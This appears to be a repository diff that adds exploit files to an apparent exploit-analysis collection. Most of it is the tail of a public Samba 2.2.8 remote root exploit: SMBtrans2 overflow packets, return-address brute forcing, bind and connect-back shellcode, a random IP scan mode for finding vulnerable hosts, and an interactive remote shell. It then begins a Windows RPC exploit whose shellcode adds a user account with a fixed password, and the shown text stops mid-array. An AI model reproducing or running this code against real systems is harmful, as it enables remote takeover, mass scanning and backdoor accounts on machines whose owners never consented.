+        send(sock, cmd, strlen(cmd), 0);
+        while(1) {
+                FD_SET(sock,&fd_read);
+                FD_SET(0,&fd_read);
+                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
+                if (FD_ISSET(sock, &fd_read)) {
+                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
+                                fprintf(stderr, "EOF\n");
+                                exit(2);
+                        }
+                        if (write(1, buff, n) < 0) break;
+                }
+                if (FD_ISSET(0, &fd_read)) {
+                        if((n = read(0, buff, sizeof(buff))) < 0){
+                                fprintf(stderr, "EOF\n");
+                                exit(2);
+                        }
+                        if (send(sock, buff, n, 0) < 0) break;
+                }
+                usleep(10);
+        }
+        fprintf(stderr, "Connection lost.\n\n");
+        exit(0);
+}
+void handler()
+{
+        int sock = 0;
+        int i = 0;
+        OWNED = 1;
+        for (i = 0; i < 100; i++)
+                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);
+        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
+                close(sock);
+                exit(1);
+        }
+        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
+                fprintf(stdout, "+ Worked!\n"
+                                "--------------------------------------------------------------\n");
+                shell(sock);
+                close(sock);
+        }
+}
+int start_session(int sock)
+{
+        char buffer[1000];
+        char response[4096];
+        char session_data1[]    = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
+        char session_data2[]    = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
+                                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
+        NETBIOS_HEADER  *netbiosheader;
+        SMB_HEADER      *smbheader;
+        memset(buffer, 0x00, sizeof(buffer));
+        netbiosheader   = (NETBIOS_HEADER *)buffer;
+        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
+        netbiosheader->type     = 0x00;         /* session message */
+        netbiosheader->flags    = 0x00;
+        netbiosheader->length   = htons(0x2E);
+        smbheader->protocol[0]  = 0xFF;
+        smbheader->protocol[1]  = 'S';
+        smbheader->protocol[2]  = 'M';
+        smbheader->protocol[3]  = 'B';
+        smbheader->command      = 0x73;         /* session setup */
+        smbheader->flags        = 0x08;         /* caseless pathnames */
+        smbheader->flags2       = 0x01;         /* long filenames supported */
+        smbheader->pid          = getpid() & 0xFFFF;
+        smbheader->uid          = 100;
+        smbheader->mid          = 0x01;
+        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
+        if(write_timer(sock, 3) == 1)
+                if (send(sock, buffer, 50, 0) < 0) return -1;
+        memset(response, 0x00, sizeof(response));
+        if (read_timer(sock, 3) == 1)
+                if (read(sock, response, sizeof(response) - 1) < 0) return -1;
+        netbiosheader = (NETBIOS_HEADER *)response;
+        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
+        if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");
+        netbiosheader   = (NETBIOS_HEADER *)buffer;
+        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
+        memset(buffer, 0x00, sizeof(buffer));
+        netbiosheader->type     = 0x00;         /* session message */
+        netbiosheader->flags    = 0x00;
+        netbiosheader->length   = htons(0x3C);
+        smbheader->protocol[0]  = 0xFF;
+        smbheader->protocol[1]  = 'S';
+        smbheader->protocol[2]  = 'M';
+        smbheader->protocol[3]  = 'B';
+        smbheader->command      = 0x70;         /* start connection */
+        smbheader->pid          = getpid() & 0xFFFF;
+        smbheader->tid          = 0x00;
+        smbheader->uid          = 100;
+        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
+        if(write_timer(sock, 3) == 1)
+                if (send(sock, buffer, 64, 0) < 0) return -1;
+        memset(response, 0x00, sizeof(response));
+        if (read_timer(sock, 3) == 1)
+                if (read(sock, response, sizeof(response) - 1) < 0) return -1;
+        netbiosheader = (NETBIOS_HEADER *)response;
+        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
+        if (netbiosheader->type != 0x00) return -1;
+        return 0;
+}
+int exploit_normal(int sock, unsigned long ret, char *shellcode)
+{
+        char buffer[4000];
+        char exploit_data[] =
+                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\x00\x00\x90";
+        int i = 0;
+        unsigned long dummy = ret - 0x90;
+        NETBIOS_HEADER  *netbiosheader;
+        SMB_HEADER      *smbheader;
+        memset(buffer, 0x00, sizeof(buffer));
+        netbiosheader   = (NETBIOS_HEADER *)buffer;
+        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
+        netbiosheader->type             = 0x00;         /* session message */
+        netbiosheader->flags            = 0x04;
+        netbiosheader->length           = htons(2096);
+        smbheader->protocol[0]          = 0xFF;
+        smbheader->protocol[1]          = 'S';
+        smbheader->protocol[2]          = 'M';
+        smbheader->protocol[3]          = 'B';
+        smbheader->command              = 0x32;         /* SMBtrans2 */
+        smbheader->tid                  = 0x01;
+        smbheader->uid                  = 100;
+        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
+        buffer[1096] = 0xEB;
+        buffer[1097] = 0x70;
+        for (i = 0; i < 4 * 24; i += 8) {
+                memcpy(buffer + 1099 + i, &dummy, 4);
+                memcpy(buffer + 1103 + i, &ret,   4);
+        }
+        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
+                        exploit_data, sizeof(exploit_data) - 1);
+        memcpy(buffer + 1800, shellcode, strlen(shellcode));
+        if(write_timer(sock, 3) == 1) {
+                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
+                return 0;
+        }
+        return -1;
+}
+int exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
+{
+        char buffer[4000];
+        char exploit_data[] =
+                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+                "\x00\x00\x00\x90";
+        int i = 0;
+        unsigned long dummy = ret - 0x30;
+        NETBIOS_HEADER  *netbiosheader;
+        SMB_HEADER      *smbheader;
+        memset(buffer, 0x00, sizeof(buffer));
+        netbiosheader   = (NETBIOS_HEADER *)buffer;
+        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
+        netbiosheader->type             = 0x00;         /* session message */
+        netbiosheader->flags            = 0x04;
+        netbiosheader->length           = htons(2096);
+        smbheader->protocol[0]          = 0xFF;
+        smbheader->protocol[1]          = 'S';
+        smbheader->protocol[2]          = 'M';
+        smbheader->protocol[3]          = 'B';
+        smbheader->command              = 0x32;         /* SMBtrans2 */
+        smbheader->tid                  = 0x01;
+        smbheader->uid                  = 100;
+        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
+        for (i = 0; i < 4 * 24; i += 4)
+                memcpy(buffer + 1131 + i, &dummy, 4);
+        memcpy(buffer + 1127, &ret,      4);
+        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
+                        exploit_data, sizeof(exploit_data) - 1);
+        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
+        if(write_timer(sock, 3) == 1) {
+                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
+                return 0;
+        }
+        return -1;
+}
+int main (int argc,char *argv[])
+{
+        char *shellcode = NULL;
+        char scan_ip[256];
+        int brute       = -1;
+        int connectback = 0;
+        int force       = 0;
+        int i           = 0;
+        int ip1         = 0;
+        int ip2         = 0;
+        int ip3         = 0;
+        int ip4         = 0;
+        int opt         = 0;
+        int port        = 139;
+        int random      = 0;
+        int scan        = 0;
+        int sock        = 0;
+        int sock2       = 0;
+        int status      = 0;
+        int type        = 0;
+        int verbose     = 0;
+        unsigned long BRUTE_DELAY       = 100000;
+        unsigned long ret               = 0x0;
+        unsigned long MAX_CHILDS        = 40;
+        unsigned long STEPS             = 300;
+        struct hostent          *he;
+        fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
+                        "--------------------------------------------------------------\n");
+        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {
+                switch(opt)
+                {
+                        case 'b':
+                                brute = atoi(optarg);
+                                if ((brute < 0) || (brute > 3)) {
+                                        fprintf(stderr, "Invalid platform.\n\n");
+                                        return -1;
+                                }
+                                break;
+                        case 'B':
+                                STEPS = atoi(optarg);
+                                if (STEPS == 0) STEPS++;
+                                break;
+                        case 'c':
+                                sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
+                                connectback = 1;
+                                if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
+                                        fprintf(stderr, "Invalid IP address.\n\n");
+                                        return -1;
+                                }
+                                linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
+                                linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
+                                linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
+                                linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;
+                                break;
+                        case 'C':
+                                MAX_CHILDS = atoi(optarg);
+                                if (MAX_CHILDS == 0) {
+                                        fprintf(stderr, "Invalid number of childs.\n");
+                                        return -1;
+                                }
+                                if (MAX_CHILDS > 99) {
+                                        fprintf(stderr, "Too many childs, using 99. \n");
+                                        MAX_CHILDS = 99;
+                                }
+                                break;
+                        case 'd':
+                                BRUTE_DELAY = atoi(optarg);
+                                break;
+                        case 'f':
+                                force = 1;
+                                break;
+                        case 'p':
+                                port = atoi(optarg);
+                                if ((port <= 0) || (port > 65535)) {
+                                        fprintf(stderr, "Invalid port.\n\n");
+                                        return -1;
+                                }
+                                break;
+                        case 'r':
+                                ret = strtoul(optarg, &optarg, 16);
+                                break;
+                        case 's':
+                                random  = 1;
+                                scan    = 1;
+                                break;
+                        case 'S':
+                                random  = 0;
+                                scan    = 1;
+                                sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
+                                ip3--;
+                                break;
+                        case 't':
+                                type = atoi(optarg);
+                                if (type == 0 || type > sizeof(targets) / 16) {
+                                        for(i = 0; i < sizeof(targets) / 16; i++)
+                                                fprintf(stdout, "%02d. %s  [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret);
+                                        fprintf(stderr, "\n");
+                                        return -1;
+                                }
+                                break;
+                        case 'v':
+                                verbose = 1;
+                                break;
+                        default:
+                                usage(argv[0] == NULL ? "sambal" : argv[0]);
+                                break;
+                }
+        }
+        if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0))
+                usage(argv[0] == NULL ? "sambal" : argv[0]);
+        if (scan == 1)
+                fprintf(stdout, "+ Scan mode.\n");
+        if (verbose == 1)
+                fprintf(stdout, "+ Verbose mode.\n");
+        if (scan == 1) {
+                srand(getpid());
+                while (1) {
+                        if (random == 1) {
+                                ip1 = rand() % 255;
+                                ip2 = rand() % 255;
+                                ip3 = rand() % 255; }
+                        else {
+                                ip3++;
+                                if (ip3 > 254) { ip3 = 1; ip2++; }
+                                if (ip2 > 254) { ip2 = 1; ip1++; }
+                                if (ip1 > 254) exit(0);
+                        }
+                        for (ip4 = 0; ip4 < 255; ip4++) {
+                                i++;
+                                snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);
+                                usleep(BRUTE_DELAY);
+                                switch (fork()) {
+                                        case 0:
+                                                switch(is_samba(scan_ip, 2)) {
+                                                        case 0:
+                                                                fprintf(stdout, "+ [%s] Samba\n", scan_ip);
+                                                                break;
+                                                        case 1:
+                                                                fprintf(stdout, "+ [%s] Windows\n", scan_ip);
+                                                                break;
+                                                        default:
+                                                                break;
+                                                }
+                                                exit(0);
+                                                break;
+                                        case -1:
+                                                fprintf(stderr, "+ fork() error\n");
+                                                exit(-1);
+                                                break;
+                                        default:
+                                                if (i > MAX_CHILDS - 2) {
+                                                        wait(&status);
+                                                        i--;
+                                                }
+                                                break;
+                                }
+                        }
+                }
+                return 0;
+        }
+        he = gethostbyname(argv[optind]);
+        if (he == NULL) {
+                fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
+                return -1;
+        }
+        if (brute == -1) {
+                if (ret == 0) ret = targets[type - 1].ret;
+                shellcode = targets[type - 1].shellcode;
+                if (connectback == 1) {
+                        fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n",
+                                        ip1, ip2, ip3, ip4);
+                        switch(targets[type - 1].os_type) {
+                                case 0: /* linux */
+                                        shellcode = linux_connect_back;
+                                        break;
+                                case 1: /* FreeBSD/NetBSD */
+                                        shellcode = bsd_connect_back;
+                                        break;
+                                case 2: /* OpenBSD */
+                                        shellcode = bsd_connect_back;
+                                        break;
+                                case 3: /* OpenBSD 3.2 Non-exec stack */
+                                        shellcode = bsd_connect_back;
+                                        break;
+                        }
+                }
+                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
+                        fprintf(stderr, "+ socket() error.\n");
+                        return -1;
+                }
+                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
+                        fprintf(stderr, "+ socket() error.\n");
+                        return -1;
+                }
+                memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
+                memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
+                addr1.sin_family = AF_INET;
+                addr1.sin_port   = htons(port);
+                addr2.sin_family = AF_INET;
+                addr2.sin_port   = htons(45295);
+                if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
+                        fprintf(stderr, "+ connect() error.\n");
+                        return -1;
+                }
+                if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);
+                if (force == 0) {
+                        if (is_samba(argv[optind], 2) != 0) {
+                                fprintf(stderr, "+ Host is not running samba!\n\n");
+                                return -1;
+                        }
+                        fprintf(stderr, "+ Host is running samba.\n");
+                }
+                if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
+                if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");
+                if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
+                sleep(5);
+                if (targets[type - 1].os_type != 2) {
+                        if (exploit_normal(sock, ret, shellcode) < 0) {
+                                fprintf(stderr, "+ Failed.\n");
+                                close(sock);
+                        }
+                } else {
+                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {
+                                fprintf(stderr, "+ Failed.\n");
+                                close(sock);
+                        }
+                }
+                sleep(2);
+                if (connectback == 0) {
+                        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {
+                                fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");
+                                return -1;
+                        }
+                        fprintf(stdout, "--------------------------------------------------------------\n");
+                        shell(sock2);
+                        close(sock);
+                        close(sock2);
+                } else {
+                        fprintf(stdout, "+ Done...\n");
+                        close(sock2);
+                        close(sock);
+                }
+                return 0;
+        }
+        signal(SIGPIPE, SIG_IGN);
+        signal(SIGUSR1, handler);
+        switch(brute) {
+                case 0:
+                        if (ret == 0) ret = 0xc0000000;
+                        shellcode = linux_bindcode;
+                        fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
+                        break;
+                case 1:
+                        if (ret == 0) ret = 0xbfc00000;
+                        shellcode = bsd_bindcode;
+                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");
+                        break;
+                case 2:
+                        if (ret == 0) ret = 0xdfc00000;
+                        shellcode = bsd_bindcode;
+                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");
+                        break;
+                case 3:
+                        if (ret == 0) ret = 0x00170000;
+                        shellcode = bsd_bindcode;
+                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");
+                        break;
+                }
+        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
+        memcpy(&addr2.sin_addr, he->h_addr, he->h_length);
+        addr1.sin_family = AF_INET;
+        addr1.sin_port   = htons(port);
+        addr2.sin_family = AF_INET;
+        addr2.sin_port   = htons(45295);
+        for (i = 0; i < 100; i++)
+                childs[i] = -1;
+        i = 0;
+        if (force == 0) {
+                if (is_samba(argv[optind], 2) != 0) {
+                        fprintf(stderr, "+ Host is not running samba!\n\n");
+                        return -1;
+                }
+                fprintf(stderr, "+ Host is running samba.\n");
+        }
+        while (OWNED == 0) {
+                if (sock  > 2) close(sock);
+                if (sock2 > 2) close(sock2);
+                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
+                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
+                }
+                else {
+                        ret -= STEPS;
+                        i++;
+                }
+                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
+                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n");
+                if ((ret & 0xff) == 0x00 && brute != 3) ret++;
+                if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);
+                usleep(BRUTE_DELAY);
+                switch (childs[i] = fork()) {
+                        case 0:
+                                if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {
+                                        if (sock  > 2) close(sock);
+                                        if (sock2 > 2) close(sock2);
+                                        exit(-1);
+                                }
+                                if(write_timer(sock, 3) == 1) {
+                                        if (start_session(sock) < 0) {
+                                                if (verbose == 1) fprintf(stderr, "+ Session failed.\n");
+                                                if (sock  > 2)close(sock);
+                                                if (sock2 > 2) close(sock2);
+                                                exit(-1);
+                                        }
+                                        if (brute == 3) {
+                                                if (exploit_openbsd32(sock, ret, shellcode) < 0) {
+                                                        if (verbose == 1) fprintf(stderr, "+ Failed.\n");
+                                                        if (sock  > 2) close(sock);
+                                                        if (sock2 > 2) close(sock2);
+                                                        exit(-1);
+                                                }
+                                        }
+                                else {
+                                        if (exploit_normal(sock, ret, shellcode) < 0) {
+                                                if (verbose == 1) fprintf(stderr, "+ Failed.\n");
+                                                if (sock  > 2) close(sock);
+                                                if (sock2 > 2) close(sock2);
+                                                exit(-1);
+                                        }
+                                        if (sock > 2) close(sock);
+                                        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
+                                                if (sock2 > 2) close(sock2);
+                                                exit(-1);
+                                        }
+                                        if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
+                                                if (sock2  > 2) close(sock2);
+                                                kill(getppid(), SIGUSR1);
+                                        }
+                                        exit(1);
+                                }
+                                exit(0);
+                                break;
+                        case -1:
+                                fprintf(stderr, "+ fork() error\n");
+                                exit(-1);
+                                break;
+                        default:
+                                if (i > MAX_CHILDS - 2) {
+                                        wait(&status);
+                                        i--;
+                                }
+                                break;
+                        }
+                }
+        }
+        return 0;
+}
+// milw0rm.com [2003-04-10]

exploit-analyzer/exploits/exploit_100.txt ADDED Viewed

	@@ -0,0 +1,291 @@

+#include <stdio.h>
+#include <winsock2.h>
+#include <windows.h>
+#include <process.h>
+#include <string.h>
+#include <winbase.h>
+#pragma comment(lib,"ws2_32")
+unsigned char bindstr[]={
+0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
+0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
+0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
+0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
+0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
+unsigned char request1[]={
+0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
+,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
+,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
+,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
+,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
+,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
+,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
+,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
+,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
+,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
+,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
+,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
+,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
+,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
+,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
+,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
+,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
+,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
+,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
+,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
+,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
+,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
+,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
+,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
+,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
+,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
+,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
+,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
+,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
+,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
+,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
+,0x00,0x00,0x00,0x00,0x00,0x00};
+unsigned char request2[]={
+0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
+,0x00,0x00,0x5C,0x00,0x5C,0x00};
+unsigned char request3[]={
+0x5C,0x00
+,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
+,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
+,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
+,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
+//user="e" pass="asd#321"
+unsigned char sc_add_user[]=
+"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
+"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
+"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
+"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
+"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
+"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
+"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
+"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
